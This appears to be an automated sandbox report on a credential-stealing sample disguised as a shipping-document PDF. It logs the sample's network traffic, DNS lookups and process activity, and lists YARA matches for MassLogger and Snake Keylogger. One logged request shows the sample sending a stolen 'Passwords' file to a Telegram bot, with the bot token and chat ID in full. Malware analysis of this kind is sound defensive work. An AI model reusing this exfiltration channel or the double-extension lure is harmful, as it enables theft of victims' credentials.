Mar 17, 2025 11:09:39.873342991 CET | 443 | 49162 | 104.21.112.1 | 192.168.2.22
Mar 17, 2025 11:09:39.873430014 CET | 49162 | 443 | 192.168.2.22 | 104.21.112.1
Mar 17, 2025 11:09:39.877861023 CET | 49162 | 443 | 192.168.2.22 | 104.21.112.1
Mar 17, 2025 11:09:39.877876043 CET | 443 | 49162 | 104.21.112.1 | 192.168.2.22
Mar 17, 2025 11:09:40.070605993 CET | 49161 | 80 | 192.168.2.22 | 132.226.247.73
Mar 17, 2025 11:09:40.071459055 CET | 80 | 49161 | 132.226.247.73 | 192.168.2.22
Mar 17, 2025 11:09:40.071564913 CET | 49161 | 80 | 192.168.2.22 | 132.226.247.73
Mar 17, 2025 11:09:40.349121094 CET | 443 | 49162 | 104.21.112.1 | 192.168.2.22
Mar 17, 2025 11:09:40.349235058 CET | 49162 | 443 | 192.168.2.22 | 104.21.112.1
Mar 17, 2025 11:09:40.354361057 CET | 49162 | 443 | 192.168.2.22 | 104.21.112.1
Mar 17, 2025 11:09:40.354374886 CET | 443 | 49162 | 104.21.112.1 | 192.168.2.22
Mar 17, 2025 11:09:40.354840040 CET | 443 | 49162 | 104.21.112.1 | 192.168.2.22
Mar 17, 2025 11:09:40.425414085 CET | 49162 | 443 | 192.168.2.22 | 104.21.112.1
Mar 17, 2025 11:09:40.472326040 CET | 443 | 49162 | 104.21.112.1 | 192.168.2.22
Mar 17, 2025 11:09:40.533129930 CET | 443 | 49162 | 104.21.112.1 | 192.168.2.22
Mar 17, 2025 11:09:40.533196926 CET | 443 | 49162 | 104.21.112.1 | 192.168.2.22
Mar 17, 2025 11:09:40.533252954 CET | 49162 | 443 | 192.168.2.22 | 104.21.112.1
Mar 17, 2025 11:09:40.535520077 CET | 49162 | 443 | 192.168.2.22 | 104.21.112.1
Mar 17, 2025 11:09:45.811121941 CET | 49161 | 80 | 192.168.2.22 | 132.226.247.73
Mar 17, 2025 11:09:45.815870047 CET | 80 | 49161 | 132.226.247.73 | 192.168.2.22
Mar 17, 2025 11:09:46.019241095 CET | 80 | 49161 | 132.226.247.73 | 192.168.2.22
Mar 17, 2025 11:09:46.031341076 CET | 49163 | 443 | 192.168.2.22 | 149.154.167.220
Mar 17, 2025 11:09:46.031382084 CET | 443 | 49163 | 149.154.167.220 | 192.168.2.22
Mar 17, 2025 11:09:46.031451941 CET | 49163 | 443 | 192.168.2.22 | 149.154.167.220
Mar 17, 2025 11:09:46.032159090 CET | 49163 | 443 | 192.168.2.22 | 149.154.167.220
Mar 17, 2025 11:09:46.032167912 CET | 443 | 49163 | 149.154.167.220 | 192.168.2.22
Mar 17, 2025 11:09:46.217031956 CET | 49161 | 80 | 192.168.2.22 | 132.226.247.73
Mar 17, 2025 11:09:46.648231983 CET | 443 | 49163 | 149.154.167.220 | 192.168.2.22
Mar 17, 2025 11:09:46.648319006 CET | 49163 | 443 | 192.168.2.22 | 149.154.167.220
Mar 17, 2025 11:09:46.656245947 CET | 49163 | 443 | 192.168.2.22 | 149.154.167.220
Mar 17, 2025 11:09:46.656253099 CET | 443 | 49163 | 149.154.167.220 | 192.168.2.22
Mar 17, 2025 11:09:46.656554937 CET | 443 | 49163 | 149.154.167.220 | 192.168.2.22
Mar 17, 2025 11:09:46.667249918 CET | 49163 | 443 | 192.168.2.22 | 149.154.167.220
Mar 17, 2025 11:09:46.712316036 CET | 443 | 49163 | 149.154.167.220 | 192.168.2.22
Mar 17, 2025 11:09:46.712362051 CET | 49163 | 443 | 192.168.2.22 | 149.154.167.220
Mar 17, 2025 11:09:46.712368011 CET | 443 | 49163 | 149.154.167.220 | 192.168.2.22
Mar 17, 2025 11:09:46.968339920 CET | 443 | 49163 | 149.154.167.220 | 192.168.2.22
Mar 17, 2025 11:09:46.968430042 CET | 443 | 49163 | 149.154.167.220 | 192.168.2.22
Mar 17, 2025 11:09:46.968467951 CET | 49163 | 443 | 192.168.2.22 | 149.154.167.220
Mar 17, 2025 11:09:46.969052076 CET | 49163 | 443 | 192.168.2.22 | 149.154.167.220
Mar 17, 2025 11:10:51.019860983 CET | 80 | 49161 | 132.226.247.73 | 192.168.2.22
Mar 17, 2025 11:10:51.019937038 CET | 49161 | 80 | 192.168.2.22 | 132.226.247.73
Mar 17, 2025 11:11:20.551553011 CET | 49161 | 80 | 192.168.2.22 | 132.226.247.73
Mar 17, 2025 11:11:20.556348085 CET | 80 | 49161 | 132.226.247.73 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 17, 2025 11:09:37.756031990 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Mar 17, 2025 11:09:37.764164925 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Mar 17, 2025 11:09:37.839934111 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Mar 17, 2025 11:09:37.846168995 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Mar 17, 2025 11:09:38.928704977 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Mar 17, 2025 11:09:38.934889078 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Mar 17, 2025 11:09:39.862629890 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Mar 17, 2025 11:09:39.872725964 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Mar 17, 2025 11:09:46.024574041 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Mar 17, 2025 11:09:46.030904055 CET | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 17, 2025 11:09:37.756031990 CET | 192.168.2.22 | 8.8.8.8 | 0x24b8 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:37.839934111 CET | 192.168.2.22 | 8.8.8.8 | 0x24b8 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:38.928704977 CET | 192.168.2.22 | 8.8.8.8 | 0x47f3 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:39.862629890 CET | 192.168.2.22 | 8.8.8.8 | 0xf83f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:46.024574041 CET | 192.168.2.22 | 8.8.8.8 | 0xb9d3 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 17, 2025 11:09:37.764164925 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 17, 2025 11:09:37.764164925 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:37.764164925 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:37.764164925 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:37.764164925 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:37.764164925 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:37.846168995 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 17, 2025 11:09:37.846168995 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:37.846168995 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:37.846168995 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:37.846168995 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:37.846168995 CET | 8.8.8.8 | 192.168.2.22 | 0x24b8 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:38.934889078 CET | 8.8.8.8 | 192.168.2.22 | 0x47f3 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 17, 2025 11:09:38.934889078 CET | 8.8.8.8 | 192.168.2.22 | 0x47f3 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:38.934889078 CET | 8.8.8.8 | 192.168.2.22 | 0x47f3 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:38.934889078 CET | 8.8.8.8 | 192.168.2.22 | 0x47f3 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:38.934889078 CET | 8.8.8.8 | 192.168.2.22 | 0x47f3 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:38.934889078 CET | 8.8.8.8 | 192.168.2.22 | 0x47f3 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:39.872725964 CET | 8.8.8.8 | 192.168.2.22 | 0xf83f | No error (0) | reallyfreegeoip.org | - | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:39.872725964 CET | 8.8.8.8 | 192.168.2.22 | 0xf83f | No error (0) | reallyfreegeoip.org | - | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:39.872725964 CET | 8.8.8.8 | 192.168.2.22 | 0xf83f | No error (0) | reallyfreegeoip.org | - | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:39.872725964 CET | 8.8.8.8 | 192.168.2.22 | 0xf83f | No error (0) | reallyfreegeoip.org | - | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:39.872725964 CET | 8.8.8.8 | 192.168.2.22 | 0xf83f | No error (0) | reallyfreegeoip.org | - | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:39.872725964 CET | 8.8.8.8 | 192.168.2.22 | 0xf83f | No error (0) | reallyfreegeoip.org | - | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:39.872725964 CET | 8.8.8.8 | 192.168.2.22 | 0xf83f | No error (0) | reallyfreegeoip.org | - | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Mar 17, 2025 11:09:46.030904055 CET | 8.8.8.8 | 192.168.2.22 | 0xb9d3 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false

• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 132.226.247.73 | 80 | 3720 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Mar 17, 2025 11:09:38.946794033 CET151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Mar 17, 2025 11:09:39.618871927 CET273INHTTP/1.1 200 OK
                                                                                              Date: Mon, 17 Mar 2025 10:09:39 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                              Mar 17, 2025 11:09:39.647978067 CET127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Mar 17, 2025 11:09:39.854804039 CET273INHTTP/1.1 200 OK
                                                                                              Date: Mon, 17 Mar 2025 10:09:39 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                              Mar 17, 2025 11:09:40.071459055 CET273INHTTP/1.1 200 OK
                                                                                              Date: Mon, 17 Mar 2025 10:09:39 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                              Mar 17, 2025 11:09:45.811121941 CET | 127 bytes | OUT | GET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Mar 17, 2025 11:09:46.019241095 CET | 273 bytes | IN | HTTP/1.1 200 OK
                                                                                              Date: Mon, 17 Mar 2025 10:09:45 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                              Session ID:0
                                                                                              Source IP:192.168.2.22
                                                                                              Source Port:49162
                                                                                              Destination IP:104.21.112.1
                                                                                              Destination Port:443
                                                                                              PID:3720
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-03-17 10:09:40 UTC | 85 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2025-03-17 10:09:40 UTC | 857 bytes | IN | HTTP/1.1 200 OK
                                                                                              Date: Mon, 17 Mar 2025 10:09:40 GMT
                                                                                              Content-Type: text/xml
                                                                                              Content-Length: 362
                                                                                              Connection: close
                                                                                              Age: 57494
                                                                                              Cache-Control: max-age=31536000
                                                                                              cf-cache-status: HIT
                                                                                              last-modified: Sun, 16 Mar 2025 18:11:25 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iiGpqrTp3jPLrynXxjd%2BYWQGOKiMahvGegLoOlnKG%2BsSlkVR8L2J6IOx8JDo6Ag5uswJ5j2211%2BZzlJVySwIomgC6AsFc%2F7C8nX6teKvzuJDg4N1B4yGxwOuJ1VyhLSExI%2FjIPZ9"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 921bb233f85042bc-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1578&rtt_var=598&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1821584&cwnd=223&unsent_bytes=0&cid=37061e3bae2beda6&ts=195&x=0"
                                                                                              2025-03-17 10:09:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                              Session ID:1
                                                                                              Source IP:192.168.2.22
                                                                                              Source Port:49163
                                                                                              Destination IP:149.154.167.220
                                                                                              Destination Port:443
                                                                                              PID:3720
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-03-17 10:09:46 UTC | 295 bytes | OUT | POST /bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary================8dd651a7455f1ea
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 1089
                                                                                              Connection: Keep-Alive
                                                                                              2025-03-17 10:09:46 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 36 35 31 61 37 34 35 35 66 31 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: --===============8dd651a7455f1eaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                              2025-03-17 10:09:46 UTC | 388 bytes | IN | HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Mon, 17 Mar 2025 10:09:46 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 557
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2025-03-17 10:09:46 UTC557INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 38 36 32 32 38 35 37 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 62 6f 64 73 62 6f 64 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 6f 64 73 62 6f 64 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 33 32 34 30 37 38 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 64 73 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 64 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 6f 64 73 62 6f 64 73 35 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 32 32 30 36 31 38 36 2c 22 64 6f 63
                                                                                              Data Ascii: {"ok":true,"result":{"message_id":2634,"from":{"id":7686228576,"is_bot":true,"first_name":"bodsbods","username":"bodsbods_bot"},"chat":{"id":7632407857,"first_name":"Bods","last_name":"Bods","username":"bodsbods51","type":"private"},"date":1742206186,"doc


                                                                                              Target ID:0
                                                                                              Start time:06:09:34
                                                                                              Start date:17/03/2025
                                                                                              Path:C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
                                                                                              Imagebase:0x10f0000
                                                                                              File size:971'776 bytes
                                                                                              MD5 hash:5FD799C047C81A8EFB15D9A32F1D8E39
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:06:09:35
                                                                                              Start date:17/03/2025
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
                                                                                              Imagebase:0x250000
                                                                                              File size:45'248 bytes
                                                                                              MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              No disassembly